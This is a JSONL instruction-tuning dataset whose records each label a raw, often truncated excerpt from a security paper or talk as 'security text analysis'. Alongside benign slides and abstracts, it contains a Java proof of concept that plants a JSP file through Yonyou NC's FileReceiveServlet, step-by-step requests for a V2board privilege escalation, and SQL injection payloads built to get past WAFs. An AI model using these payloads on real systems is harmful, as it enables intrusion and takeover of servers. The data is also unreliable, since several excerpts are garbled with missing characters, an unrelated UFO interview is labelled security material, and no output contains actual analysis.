{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云影实验室 1 / 12 .NET 高级代码审计第一课XmlSerializer 反序列漏洞 Ivan1ee@360 云影实验室 2019 年 03 月 01 日 云影实验室 2 / 12 0X00 前言 在.NET 框架中的 XmlSerializer 类是一种很棒的工具它是将高度结构化的 XML 数据 映射为 .NET 对象XmlSerializer 类在程序中通过单个 API 调用来执行 XML 文档和对 象之间的转换转换的映射规则在 .NET 类中通过元数据属性来表示如果程序开发人 员使用 Type 类的静态方法获取外界数据并调用 Deserialize 反序列化 xml 数据就会 触发反序列化漏洞攻击例如 DotNetNuke 任意代码执行漏洞 CVE-2017-9822本 文笔者从原理和代码审计的视角做了相关脑图介绍和复现 0X01 XmlSerializer 序列化 .NET 框架中 System.Xml.Serialization 命名空间下的 XmlSerializer 类可以将 XML 文 档绑定到 .NET 类的实例有一点需要注意它只能把对象的公共属性和公共字段转换为 XML 元素或属性并且由两个方法组成Serialize() 用于从对象实例生成 XML Deserialize() 用于将 XML 文档分析成对象图被序列化的数据可以是数据字段数 组以及 XmlElement 和 XmlAttribute 对象格式的内嵌 XML具体看下面 demo 云影实验室 3 / 12 XmlElement 指定属性要序列化为元素XmlAttribute 指定属性要序列化为特性 XmlRoot 特性指定类要序列化为根元素通过特性类型的属性影响要生成的名称 名称空间和类型再创建一个 TestClass 类的实例填充其属性序列化为文件 XmlSerializer.Serialize 方法重载可以接受 StreamTextWriteXmlWrite 类最终 生成的 XML 文件列出了 TestClass 元素Classname 特性和其它存储为元素的属性 0x02 XmlSerialize 反序列化 反序列过程将 xml 文件转换为对象是通过创建一个新对象的方式调用 XmlSerializer.Deserialize 方法实现的在序列化最关键的一环当属 new XmlSerializer 构造方法里所传的参数这个参数来自 System.Type 类通过这个类可 以访问关于任意数据类型的信息指向任何给定类型的 Type 引用有以下三种方式 云影实验室 4 / 12 2.1typeof 实例化 XmlSerializer 传入的 typeof(TestClass) 表示获取 TestClass 类的 Type typeof 是 C#中的运算符所传的参数只能是类型的名称而不能是实例化的对象如 下 Demo 通过 typeof 获取到 Type 之后就能得到该类中所有的 MethodsMembers 等信息 下图运行 Debug 时弹出消息对话框显示当前成员 Name 的值 2.2object.Type 在.NET 里所有的类最终都派生自 System.Object在 Object 类中定义了许多公有和受 保护的成员方法这些方法可用于自己定义的所有其他类中GetType 方法就是其中的 一个该方法返回从 System.Type 派生的类的一个实例因为可以提供对象成员所属类 的信息包括基本类型方法属性等上述案例中实例化 TestClass再获取当前实 例的 Type如下 Demo 云影实验室 5 / 12 2.3Type.GetType 第三种方法是 Type 类的静态方法 GetType这个方法允许外界传入字符串这是重大 利好只需要传入全限定名就可以调用该类中的方法属性等 Type.GetType 传入的参数也是反序列化产生的漏洞污染点接下来就是要去寻找可以 被用来攻击使用的类 0X03 打造攻击链 首先放上攻击链打造成功后的完整 Demo这段 Demo 可以复用在任意地方这里不 涉及.NET CoreMVC如下图 只要 XmlSerializer 存在反序列化漏洞就可用下面 Demo 中的内容涉及到三个主要的 技术点以下分别来介绍原理 3.1ObjectDataProvider ObjectDataProvider 类它位于 System.Windows.Data 命名空间下可以调用任意 被引用类中的方法提供成员 ObjectInstance 用类似实例化类成员 MethodName 云影实验室 6 / 12 调用指定类型的方法的名称成员 MethodParameters 表示传递给方法的参数参考 下图 再给 TestClass ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n型企业应用安全案 钟卫林 OWASP 亚洲峰会 深圳 2017年 7月 型企业应用安全的挑战  规模 (Scalability)  应用数量  代码数量  开发员数量  团队业务数量 型企业应用安全的挑战  复杂度 (Complexity)  应用类型  编程语类型  技术类型  编译环境  团队架构和化 型企业应用安全的挑战  效率 (Efficiency)  扫描速度  扫描容量  系统资源  具安装  具使用  流程集成 型企业应用安全的挑战  效用  Effectiveness  结果质量  准确度  从发现到修复  与现有环境流程的集成 型企业应用安全的挑战  Governance 治理  策略和法规  流程和规则  团队建设  检测和监测  指标 (metrics)  变化 (trending)  报告 dashboards) 解决案 融政府传统业  授与鱼不如授与渔  重防御早发现  An ounce of prevention is worth a pound of cure 解决案 新型互联公司  轻流程重监测快反应  安全问题交给专家解决 解决案的三要素  化  技术资源  流程 管理 型企业应用安全框架  策略和法规  培训和指南  分析和检测  流程和管控  操作和执  风险分析和控制 应用安全流程集成 应用开发安全实践 Microsoft Security Development Lifecycle 应用安全策略和法规  策略和法规  安全法规  PCI, HIPPA, 络安全法密码法  安全政策  数据分级  交易风险分级  应用分级  批准的加密算法和实现 (Approved Crypto & Implementations)  批准的具 (Approved Tools)  批准的库 (Approved Libraries)  安全标准和指南 应用安全培训和指南  课程  核安全培训  安全代码标准和基准  不安全功能  威胁建模  安全设计  代码检测和静态分析  动态检测和侵测试  安全检测  其他相关安全课程  培训式 应用安全设计分析和检测  分析和检测  安全需求  风险建模  安全设计  同代码检测  静态分析  动态分析  攻击面分析  关联程序库安全分析 设计检测具与定制  安全为  安全需求  风险建模  安全设计  具  应用画像 Questionnaire/Profiling)  专家系统 应用需求设计风险  安全规则  安全checklist  漏洞管理  整体流程集成 同安全代码评测具与定制  同代码检测(Secure Peer Review) 静态分析具与定制 扫描源代码新语新架构 规则易改 扫描进制代码传统语支持 传统架构规则难改 其他静态分析具 动态测试具 应用安全分析具SAAS模式 动静态结合具举例  动静态结合安全测试 Integrated Application Security Testing (IAST)  实时应用安全防护 Runtime Application Self-Protection (RASP) 关联程序库安全分析 流程和管控具与定制  安全流程实现策略  软件开发流程集成  安全漏洞条  外部软件供应商安全规范  数据和报告  企业应用建库管理 风险分析和控制  风险分析  安全问题排级  企业整体安全报告  实时全面目了然  及时调整安全策略  相关具 操作和执  应用安全中集中定义流程  Center of Excellence (COE)  业务线执团队  Satellite Operation Teams (Application Security Champions)  服务和咨询  应急反应  安全自动化 应用安全新趋势  新技术趋势  云安全外包数据保护容器安全  移动认证病毒个信息和隐私  数据用户为信用体制  智能  机器学习和深度学习  发现新漏洞  减低误报率  降低或者替代分析  检测异常为和恶意攻击  建立可靠的保护隐私的信用体制  自动产安全规则  安全自动化 应用安全新趋势  挑战和机遇共存  建立安全态  输出安全服务", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Market for Malware Dr. Thomas J. Holt Assistant Professor Department of Criminal Justice University of North Carolina at Charlotte tjholt@uncc.edu 704-687-6081 Copyright 2007. All references to this work must appropriately cite the author, Thomas J. Holt. Digital Crime Markets  The problem of malware and computer based theft is increasing and becoming more complex  IC3 reports that spam and phishing complaints have increased over the past two years  CSI/FBI reports that virus contamination cost businesses $15 million and bot damages were estimated at $923,700 in 2006  Law enforcement agencies have begun to crack down on malware users and data thieves  Operation Firewall, Operation Bot Roast Digital Crime Markets  There are a range of websites, forums, and IRC channels devoted to malicious computer activity  Malware, carding, and stolen data  These sites can provide direct information on current and emerging threats and the individuals responsible for their creation  Provides a snapshot of computer crime Data  Data generated from public web forums and sties actively involved in  Carding  Malware  Hacking and security  Posts were examined along with any available materials provided in each forum  Machine translations  Human translators Forum Structure  The forums are structured to act as advertising spaces for the sellers and writers  Individuals post their products or services  Moderators review and verify products  Buyers post feedback or questions  Sellers answer and address comments Customer Reviews of Malware  Oleg  Thank you for a FreeJoiner, is the best program in its class I have ever seen, the result of the use was not long in coming, weaknesses and suggestions on the work simply no!  f0rd  It is like this Joiner. The best of me once or seen many useful Fitch, Joiner make this one of the most powerful products on the market.  Zolden  Anticipate just super, which was bought at the height. Works well, connects all the files without exception, to find a new ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInterview with Edgar Mitchell, ScD., Captain USN (Ret) by Richard Thieme RT: Youve been involved with consciousness studies, including the exploration of UFOs, for some time. Whats your primary focus? EM: My focus has never been primarily on UFOs. My focus has been consciousness studies for thirty years. I kind of back doored into this because of my work in consciousness studies and talking to John Mack about abductees or experiencers as he prefers to call them. I ran into a large number of what I call the old timers, people in government, in the military and intelligence work going back fifty years, who say, Yes, its all true. RT: When I was a parish priest on the edge of an air force base, I was told by a member of the parish, an air force fighter pilot, that the basic reports were true  that our pilots have encountered vehicles which have paced fighters and literally flown rings around them, doing things that even in black budget projects at the time were impossible. Because I know that black budget projects create technologies that seem fantastic to ordinary people, I like to focus on early reports, from 1947-1952, when the waters were not quite so muddy. EM: That has been my focus too. I grew up in Roswell NM and remember when that story broke. I was just a kid in high school. When it was dismissed the next day as weather balloons I wrote it off and went about my business. My grandparents were in the cattle business and knew the Brazells. So we were there but it never really came back to me until ten-twelve years ago when I really became interested in the consciousness stuff and John Mack and I started getting literature and seeing names I recognized from Roswell. I was close personal friends with Werner von Braun. Although he never mentioned that event, he was very interested in my consciousness work. And then a few other people, military, retired generals and admirals, that years ago I happened to encounter, and they all said oh yes, it really was all real, w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 19, Las Vegas 2011 Port Scanning Without Sending Packets Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview How This All Started Its Not A Magic Trick Loose Lips Sink Ships Catch Me If You Can Back To The Future Suppose You Have This Guy On Your Network  Suppose You Have This Guy On Your Network  Suppose You Have This Guy On Your Network  Host Name? Suppose You Have This Guy On Your Network  Characterize Profile Asset or Intruder Role Function Determination 10.111.128.55 nbtstat Host Name Suppose You Have This Guy On Your Network  Characterize Profile Asset or Intruder Role Function Determination 10.111.128.55 ? Host Name What is all this multicast? Me! Its Multicast DNS (mDNS)! Purpose Name Resolution (Peer-to-Peer) History AppleTalk Name Binding Protocol Zero Configuration Networking Development Multicast DNS DNS-Service Discovery Features Messages Same formats and operating semantics as conventional DNS Based on local domain Shared and unique records Operations Queries and responses sent to 224.0.0.251 Utilizes UDP port 5353 for both resolvers and responders Usage Probe Announcement - Startup - - For those resource records that it desires to be unique on the local link - Proposed questions in the Authority Section as well - Any Type record - All shared and unique records in answer section - Unique have their cache-flush bit set - Repeated any time should rdata change - Unsolicited response (query) (response) 224.0.0.251 224.0.0.251 Usage Querying Responding - Resolution - - One-shot queries, and continuous ongoing queries - Source port determines compliance level of the resolver - Fully compliant resolvers can receive more than one answer - Known answer suppression - Truncation is used for large known answer set - Mutlicast or unicast response per the query parameter - Unicast queries are always treated as having the QU bit set - Cache-flush bit indicates an authoritative answer - No queries", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漏洞点:/servlet/FileReceiveServlet 根据web.xml 向导查看对应servlet的映射 /service/* 和 /servlet/* 都对应nc.bs.framework.server.InvokerServlet 类 其类在/yonyou\\home\\lib\\fwserver.jar 包内 其servlet的doGet和doPost方法都指向doAction方法 这里直接看doAction方法就可以了 这里主要是根据request.getPathInfo()的值获取了对应的moduleName和 serviceName 最终将值传递给了getServiceObject方法 其getServiceObject的主要作用是根据moduleName和serviceName去查找服 务 最终问题在于FileReceiveServlet 根据文档FileReceiveServlet所对应的类为 com.yonyou.ante.servlet.FileReceiveServlet jar包所在目录:/yonyou\\home\\modules\\uapss\\lib 问题主要在68行File outFile = new File(path, fileName); 这里创建了一个文件导致任意文件上传 不过这里需要注意的是path和fileName的值是将req.getInputStream(); io 流进行反序列化操作并将结果传递给metaInfoi接口 63行还调用了readObject()还可以尝试一下反序列化漏洞 path和filename分别获取metaInfo的TARGET_FILE_PATH键和FILE_NAME键 的值 70行创建文件流并将getInputStream 的内容进行写入 造成任意文件上传 编写POC: 这里参考了一下其他师傅的写法 1 import java.io.ByteArrayOutputStream; 2 import java.io.IOException; 3 import java.io.InputStream; 4 import java.io.ObjectOutputStream; 5 import java.util.Map; 6 import java.io.*; 7 import java.util.HashMap; 8 9 10 public class test { 11 public static void main(String[] args) throws IOException { 12 Map metaInfo=new HashMap(); 13 metaInfo.put(\"TARGET_FILE_PATH\",\"webapps/nc_web\"); //nc6.5的默认目录为we bapps/nc_web 14 //且该目录存在文件执行权限 15 metaInfo.put(\"FILE_NAME\",\"test.jsp\"); //定义FILE_NAME键值为test.jsp 16 //根据File outFile = new File(path, fileName); 17 //文件最终在/webapps/nc_web/test.jsp 也就是根目录下的test.jsp 18 ByteArrayOutputStream bOut=new ByteArrayOutputStream(); 19 //创建字节缓冲区 20 ObjectOutputStream os=new ObjectOutputStream(bOut); 21 os.writeObject(metaInfo); 22 InputStream in=test.class.getResourceAsStream(\"test.jsp\"); 23 //读取test.jsp的内容 24 byte[] buf=new byte[1024]; 25 int len=0; 26 while ((len=in.read(buf))!=1){ 27 bOut.write(buf,0,len); 28 } 29 FileOutputStream fileOutputStream = new FileOutputStream(\"E:\\\\1.cer\"); 30 fileOutputStream.write(bOut.toByteArray()); 31 32 } 33 }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRouting in the Dark: Pitch Black Anonymous Abstract. In many networks, such as mobile ad-hoc networks and friend- to-friend overlay networks (darknets), direct communication between nodes is limited to specific neighbors. Often these networks have a small- world topology; while short paths exist between any pair of nodes in small-world networks, it is non-trivial to determine such paths with a distributed algorithm. Recently, Clarke and Sandberg proposed the first decentralized routing algorithm that achieves efficient routing in such small-world networks. This paper is the first independent security analysis of Clarke and Sand- bergs routing algorithm. We show that a relatively weak participating adversary can render the overlay ineffective without being detected, re- sulting in significant data loss due to the resulting load imbalance. We have measured the impact of the attack in a testbed of 800 nodes using minor modifications to Clarke and Sandbergs implementation of their routing algorithm in Freenet. Our experiments show that the attack is highly effective, allowing a small number of malicious nodes to cause rapid loss of data on the entire network. We also discuss various proposed countermeasures designed to detect, thwart or limit the attack. While we were unable to find effective counter- measures, we hope that the presented analysis will be a first step towards the design of secure distributed routing algorithms for restricted-route topologies. 1 Introduction Fully decentralized and efficient routing algorithms for restricted route networks promise to solve crucial problems for a wide variety of networking applications. Efficient decentralized routing is important for sensor and general wireless net- works, peer-to-peer overlay networks and theoretically even next generation In- ternet (IP) routing. A number of distributed peer-to-peer routing protocols de- veloped in recent years achieve scalable and efficient routing by constructing a structured overlay topology [4,5,8,11", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRoom for Escape: Scribbling Outside the Lines of Template Security Oleksandr Mirosh (oleksandr.mirosh@microfocus.com) & Alvaro Muñoz (pwntester@github.com) Abstract Now more than ever, digital communication and collaboration are essential to the modern human experience. People around the globe work together online as they share information, create documents, send emails, and collaborate on spreadsheets and presentations. Shared digital content is everywhere and networked communication platforms and software play a crucial role. Content Management Systems (CMS) allow the user to design, create, modify, and visualize dynamic content. For many companies, CMS platforms are pivotal to their content pipelines and workforce collaboration. In our research, we discovered multiple ways to achieve Remote Code Execution (RCE) on CMS platforms where users can create or modify templates for dynamic content. In today's multi-tenancy ecosystems, this often implies that a co-tenant on the same system can take over control of the CMS resources on which your organization relies. Using Microsoft Sharepoint and a variety of Java template engines as our main CMS attack surface, we combined implementation and design flaws with framework and language specific features to find more than twenty unique RCE vulnerabilities in Microsoft Sharepoint, Atlassian Confluence, Alfresco, Liferay, Crafter CMS, dotCMS, XWiki, Apache Ofbiz, and more. This paper presents our analysis of how these products and frameworks implement security controls and reviews techniques we used to bypass them. We describe all the vulnerabilities we uncovered in detail and show working demos of the most interesting attacks where unprivileged users can run arbitrary commands on SharePoint or Liferay servers. Finally, we present our general review methodologies for systems with dynamic content templates and provide practical recommendations to better protect them. Security Review of Microsoft SharePoint Server Introduction to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nssh-add === 把专用密钥添加到ssh-agent的高速缓存中 ## 补充说明 **ssh-add命令** 是把专用密钥添加到ssh-agent的高速缓存中该命令位置在`/usr/bin/ssh-add` ### 语法 ```shell ssh-add [-cDdLlXx] [-t life] [file ...] ssh-add -s pkcs11 ssh-add -e pkcs11 ``` ### 选项 ```shell -D删除ssh-agent中的所有密钥. -d从ssh-agent中的删除密钥 -e pkcs11删除PKCS#11共享库pkcs1提供的钥匙 -s pkcs11添加PKCS#11共享库pkcs1提供的钥匙 -L显示ssh-agent中的公钥 -l显示ssh-agent中的密钥 -t life对加载的密钥设置超时时间超时ssh-agent将自动卸载密钥 -X对ssh-agent进行解锁 -x对ssh-agent进行加锁 ``` ### 实例 1把专用密钥添加到 ssh-agent 的高速缓存中 ```shell ssh-add ~/.ssh/id_dsa ``` 2从ssh-agent中删除密钥 ```shell ssh-add -d ~/.ssh/id_xxx.pub ``` 3查看ssh-agent中的密钥 ```shell ssh-add -l ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEffective InfoSec Career Planning Beyond Job Hopping to a Real Career Lee Kushner / Mike Murray Lee@InfoSecLeaders.com / Mike@InfoSecLeaders.com 2 Who Are We?  InfoSecLeaders.com  The best source for career guidance for information security professionals  A place to learn, grow, ask and share about the difficulties of navigating this difficult industry.  The principals  Lee Kushner  Over 10 years of Success Recruitment of Information Security Professionals  Founder and CEO of the Leading Information Security Recruitment Firm, LJ Kushner and Associates LLC  Wide Range of Nationally Based Clients from Fortune 500s to security product vendors  Mike Murray  Security professional with a decade of experience in penetration testing and vulnerability research  CISO of Foreground Security, managing partner of Michael Murray and Associates, where he directs diverse security industry projects.  Security blogger (Episteme.ca), podcaster, and regular speaker on social engineering, vulnerability management and the human side of security. 3 The Fake Study  We wanted to open with a great story  The oft-quoted Yale study on Goal Setting  3% of the students wrote down goals, 97% didnt  That 3% exceeded the accomplishments of the entire other 97%.  The study isnt true  Widely quoted, not real.  Why is it so prolific?  Brian Tracy said it best:  [I] heard this story originally from Zig Ziglar. If it's not true it should be.  Because Goal Setting really does make life better  But its hard work. So most people dont do it. A History Lesson They that do not learn their history are doomed to repeat it. 4 5 Timeline  The Early Years 6 Interconnecting October 13, 1994 August 24, 1995 November 8, 1996 Vulnerability Environment:  Syn Flooding  UDP Denial of Service  Smurf attacks  Teardrop  Land 7 The Internet Era Major Vulnerabilities in:  Bind  Sendmail  Sadmind  Apache  IIS  Wu-FTPD  Tooltalk  IMAP  POP  SQL Server  Statd, CDE Major Worms: Cod Red Nimda SQL Slammer MS Blaster Step 1 Know Whe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpenBSD Remote Exploit Only two remote holes in the default install Alfredo Ortega, Gerardo Richarte Core Security April 2007 Abstract OpenBSD is regarded as a very secure Operating System. This article details one of the few remote exploit against this system. A kernel shellcode is described, that disables the protections of the OS and installs a user-mode process. Several other possible techniques of exploitation are described. CONTENTS CONTENTS Contents 1 Introduction 2 2 Vulnerability 2 2.1 Mbufs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 2.2 ICMPV6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 2.3 Overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.4 Gaining code execution . . . . . . . . . . . . . . . . . . . . . . 5 2.4.1 4-bytes Mirrored write . . . . . . . . . . . . . . . . . . 5 2.4.2 Pointer to ext free() . . . . . . . . . . . . . . . . . . . 5 2.4.3 Where to jump? . . . . . . . . . . . . . . . . . . . . . . 6 3 Now, what? 7 3.1 Hooking the system call . . . . . . . . . . . . . . . . . . . . . 7 4 ShellCode 7 4.1 Pseudo code . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.2 Detailed description of operation . . . . . . . . . . . . . . . . 8 5 OpenBSD WˆX internals 11 6 Syscall Hook 12 6.1 Pseudo code . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 6.2 Detailed description of operation . . . . . . . . . . . . . . . . 13 6.3 context-switch limit . . . . . . . . . . . . . . . . . . . . . . . . 18 7 User ShellCode 18 7.1 Pseudo code . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 7.2 Detailed description of operation . . . . . . . . . . . . . . . . 19 8 Failed attempts 20 9 Proposed Protection 21 10 Conclusion 22 References 23 1 2 VULNERABILITY 1 Introduction OpenBSD is a Unix-derivate Operating system, focused on security and code correctness. Its widely used on firewalls, intrusion-detection systems and VPN gateways, because of the security enhancements that it impleme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBringing Sexy Back Breaking in with Style Pentest? Really?!?!  Pentest has betting getting a bad rap lately  The demand hasnt dropped off  Testers hate doing it because its boring Why is pentesting boring? Its seldom about 0day, its most about lame php bugs or password cracking Why is pentesting boring? Customers dont understand them. I once was hired to do a pen test on a Class C that had nothing on it. Why is pentesting boring? Watching scanners run is boring Where is the excitement? This cant be it, there must be more to this than some scanners, password crackers, and out of date software. Where is the mystery, the intrigue, the fun stuff? Boring? We have two ways pen testing can be interesting, easy, and surprisingly successful. 1. iPhone in a box. iPhone in a box is simple  Step 1  Get a Box  Step 2  Put your iPhone in a Box  Step 3  Mail the box Step 1  Get a box  Get a box.  We used the original iPhone box.  It doesnt look very suspicious  And its the perfect size for everything we need to fit inside. Step 2 - Put your iPhone in the box All the materials Battery problems?  The iPhone will last a day or so if it is on constantly and scanning.  Batteries to the Rescue!  APC makes mobile batteries Battery Problems?  We have found that with a fully charged battery an iPhone can run for 5 days with activity. Back to the box  The default box has enough room for the phone, the battery, and the cables..  It requires some cutting of plastic  Easy to do with any knife Cutting, Cutting, Cutting All done Now for the plastic Fits like a glove! Disable the autolock and poweroff.. Box built, now what? Configure the iPhone  Jailbreak the iPhone  Install SSH and the BSD subsystems  Install tcpdump, APLogger, and anything else you might use  Do some custom stuff What is custom?  How it connects to you  You cant SSH to the phones IP address  So you can have it connect to you  Write a program that behaves like shellcode  Starting a process with a shell  Redirect standard in and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# V2board 1.6.1 Privilege Escalation [中文版本(Chinese version)](README.zh-cn.md) V2board is a multiple proxy protocol manage panel application interface. In the version of 1.6.1, it is introduced a redis cache mechanism to save the user session. Since there is no distinction between administrator and normal user in the cache layer, resulting in normal users being able to use their token to access the administrator interface. References: - <https://github.com/v2board/v2board/commit/5976bcc65a61f7942ed4074b9274236d9d55d5f0> ## Vulnerable Environment Execute following command to start the V2board 1.6.1: ``` docker compose up -d ``` After the server is started, browse the `http://localhost:8080` to see the default login page of the V2board. ## Exploit First of all, you have to register a normal user. Then, replace the email and password with your own data and login: ``` curl -i -s -k -XPOST --data-binary \"email=example%40example.com&password=a123123123\" http://localhost:8080/api/v1/passport/auth/login ``` The server will response a \"auth_data\" to you: ![](1.png) Copy it and end the following request with your \"auth_data\": ``` GET /api/v1/user/info HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E= Cache-Control: max-age=0 ``` ![](2.png) This step is to let server save your authorization to Redis cache. Finally, you are able to simply call all admin API with this authorization, for example `http://your-ip:8080/api/v1/admin/user/fetch`: ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Tricky Guess Category: Programming, 50 Points ## Description > All you need to know is: netcat tricky-guess.csa-challenge.com 2222 > > Good luck! A word list was attached. ## Solution We'll take a look at the word list first: ```console root@kali:/media/sf_CTFs/checkpoint/Tricky_Guess# head words.txt krzvctoxdnya mxehqdbglvjs mishdcerlfzk qjecszbfhard upbikezhrgqj etmwcbnvkjgz jrxlizuhtbve slaqphcmygfz rnhvjicedgzp plgexuarvmsz root@kali:/media/sf_CTFs/checkpoint/Tricky_Guess# wc -l words.txt 10000 words.txt ``` So we have 10000 \"words\", one per line, in this file. Let's connect to the server: ```console root@kali:/media/sf_CTFs/checkpoint/Tricky_Guess# nc tricky-guess.csa-challenge.com 2222 In this tricky game we have randomized a word out of a given wordlist. Your job is to guess that word. On each guess we will provide you number of characters you were correct with, without any indication upon what characters or their position. You have multiple limitations though: - On each run a new word is randomized. - You have 15 tries. - We are limiting the connection to 30 seconds. To block bruteforce we will show you the next cat and wait... _ | \\ | | | | |\\ | | /, ~\\ / / X `-.....-------./ / ~-. ~ ~ | \\ / | <------------- Louie The Cat \\ /_ ___\\ / | /\\ ~~~~~ \\ | | | \\ || | | |\\ \\ || ) (_/ (_/ ((_/ GO ! xmhnqwteksfj 7 jrxlizuhtbve 4 xwgonartsdfq 10 ``` We have to guess the word that the server has chosen within 15 attempts, when all we get back is the number of characters we were correct with, without any indication upon what characters or their position. Well, it turns out that the most trivial strategy actually works here: We make a random guess, check the number of common letters, eliminate all words that don't match and continue. Here's the code: ```python from pwn import * import random def main(): with open(\"words.txt\") as f: words = [word.rstrip() for word in f.readlines()] r = remote(\"tricky-guess.csa-challenge.com\", 2222) r.recvuntil(\"GO !\\n\") for i in range(16", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAugust 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Exploit Mitigation Techniques on iOS Max Bazaliy A Journey Through August 4-7, 2016 About me 1 2 3 4 5 6 7 8 9 10 11 12 o From Kiev, Ukraine o Staff Engineer at Lookout o Focused on XNU, Linux and LLVM internals o Interested in jailbreak techniques o Worked on obfuscation and DRM in a past o Member of Fried Apple team August 4-7, 2016 Agenda 1 2 3 4 5 6 7 8 9 10 11 12 o iOS security mechanisms o Function hooking o iOS 8 & 9 exploit mitigations o Bypassing code signatures o Future attacks August 4-7, 2016 o Memory protections o Code signing o Sandbox o Secure boot process o Privilege separation o Kernel Patch Protection 1 2 3 4 5 6 7 8 9 10 11 12 iOS security mechanisms August 4-7, 2016 o No way to change existing page permission o Pages can never be both writable and executable o No dynamic code generation without JIT o Non executable stack and heap o ASLR / KASLR 1 2 3 4 5 6 7 8 9 10 11 12 Memory protections August 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Allocating new regions kern_return_t vm_map_enter(){! ...! #if CONFIG_EMBEDDED! if (cur_protection & VM_PROT_WRITE){! if ((cur_protection & VM_PROT_EXECUTE) && !entry_for_jit){! printf(\"EMBEDDED: curprot cannot be write+execute. turning off execute\\n);! cur_protection &= ~VM_PROT_EXECUTE;! }! }! #endif /* CONFIG_EMBEDDED */! ...! } http://opensource.apple.com//source/xnu/xnu-3248.20.55/osfmk/vm/vm_map.c! August 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Changing existing regions kern_return_t vm_map_protect(){! ...! #if CONFIG_EMBEDDED! if (new_prot & VM_PROT_WRITE) {! if ((new_prot & VM_PROT_EXECUTE) && !(curr->used_for_jit)) {! printf(\"EMBEDDED: %s can't have both write and exec at the same time\\n\", __FUNCTION__);! new_prot &= ~VM_PROT_EXECUTE;! }! }! #endif! ...! } http://opensource.apple.com//source/xnu/xnu-3248.20.55/osfmk/vm/vm_map.c! August 4-7, 2016 o Mandatory Access Control Framework (MACF) o Code must be signed by trusted party o Signed page hashes match running code 1 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n这今天绕了很多 waf很多人想看其实很简单 只测试了 SQL 注入和文件上传其他的变化都太小了比如 SSRF一般拦的都很死比如 XXEUTF-7/UTF-16 试一下就行了 文件上传的绕过方式安全客有篇文章已经介绍的非常非常详细了 https://www.anquanke.com/post/id/241265 SQL 注入的绕过方式呢你们可以看我写的几个弱点 先看 WAF 是否完全拦截了/**//*!*/--%23 这四种注释一般只会拦截前两个然后 在注释中塞足够多的脏数据一部分 WAF 很吃这一招 然后可以试一试分块传输一部分 WAF 不拦截这个 再然后WAF 主要拦截 SQL 注入中的 union select from 以及 database()等关键词你就 要想办法让 WAF 不能正确的识别它们 最典型的是当 WAF 对%0A 识别不准确时%23/*%0Aunion%23%*/0Aselect 可能就会 过 再然后 union 前面可以跟 0e0union select 后面可以跟 select-1select@1select{x%201} from 前面可以跟 select%201,\\Nfrom 以及圆括号的灵活运用 这些和非空白符粘在一起都会干扰 WAF 的判断 当然如果 WAF 连 aaaaaaunionaaaaaaaaselectaaa 都拦截还是放弃吧(点名批评宝塔) database()这种拦截可能可以用 database/**/(%0A)绕过如果实在绕不过也可以放弃用 同义语句 最后%00 在 Oracle 中可以当空白符%01-%08 可以在 mssql 中当空白符%A0 可以在 linux-mysql 当空白符这些都是有可能被 waf 忽视的", "category": "text_analysis", "source": "security_papers"}
